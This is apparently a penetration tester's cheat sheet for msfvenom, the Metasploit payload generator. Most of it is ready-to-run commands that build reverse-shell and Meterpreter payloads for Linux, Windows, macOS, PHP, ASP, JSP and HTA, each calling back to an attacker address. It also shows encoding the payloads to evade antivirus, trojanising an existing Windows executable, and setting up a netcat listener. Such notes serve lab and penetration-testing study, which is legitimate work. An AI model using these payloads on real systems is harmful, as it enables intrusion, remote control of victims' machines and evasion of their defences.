Msfvenom – Lisandre

Generate payloads. Part of the Metasploit Framework.

List modules

Encoders

msfvenom -l encoders

Output formats

Client-side attacks:

HTML Application: hta-psh
Microsoft Office Macro: vba, vba-psh

msfvenom -l formats

Payloads

msfvenom -l payloads

Platforms

msfvenom -l platforms

Generating a reverse shell payload

Reverse shell cheat sheets:

Naming convention: “windows/shell_reverse_tcp” (unstaged, entire payload) vs “windows/shell/reverse_tcp” (staged)

Staged payloads don’t work with netcat! You must use Metasploit‘s exploit/multi/handler module. Staged payloads are better at antivirus evasion.

KALI_IP=x.x.x.x
LISTENER_PORT=4444

LHOST can be the name of the network interface, like LHOST=tun0

Meterpreter

Linux (staged)

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f elf > linux_shell.elf

Windows (staged)

EXE files must be transferred in binary mode.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f exe > windows_shell.exe

Windows HTTP payload (non staged)

payload/windows/meterpreter_reverse_http

Windows HTTP payload (staged)

payload/windows/meterpreter/reverse_http

Mac OS

msfvenom -p osx/x86/meterpreter/shell_reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f maco > mac_shell.macho

PHP

msfvenom -p php/meterpreter/reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f raw > php_shell.php

ASP

Useful web shell: /usr/share/seclists/Web-Shells/FuzzDB/cmd.aspx

msfvenom -p windows/meterpreter/reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f asp > asp_shell.asp

msfvenom -p windows/meterpreter/reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f asp >reverse.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f aspx >reverse.aspx

Not Meterpreter

Netcat listener for shell_reverse_tcp (unstaged)

sudo nc -lnvp 443

Linux binary – Staged (Multi Handler only)

msfvenom -p linux/x86/shell/reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f elf > myprecious.elf

Linux binary – Unstaged

Same as Netcat listener.

msfvenom -p linux/x86/shell_reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f elf > myprecious.elf

Raw Windows PE reverse shell executable – Unstaged (entire payload)

EXE files must be transferred in binary mode.

Same as Netcat listener.

msfvenom -p windows/shell_reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f exe > myprecious.exe

Encoded Windows PE reverse shell executable – Unstaged (entire payload)

-i: number of encoding iterations. Does not evade detection anymore 🙁

msfvenom -p windows/shell_reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f exe -e x86/shikata_ga_nai -i 9 -o myprecious.exe

Inject Encoded Windows reverse shell into existing PE file

msfvenom -p windows/shell_reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/whoami.exe -o myprecious.exe

Windows reverse shell, HTA + Powershell

See HTML Applications (HTA).

sudo msfvenom -p windows/shell_reverse_tcp LHOST=${KALI_IP} LPORT=${LISTENER_PORT} -f hta-psh -o /var/www/html/poc_hta.hta

Microsoft Office Macros

See Microsoft Office Macros.

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f raw > jsp_shell.jsp

Generating payloads from msfconsole

msfconsole -q
use windows/shell_reverse_tcp
generate LHOST=$KALI_IP LPORT=$LISTENER_PORT -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/whoami.exe -o myprecious.exe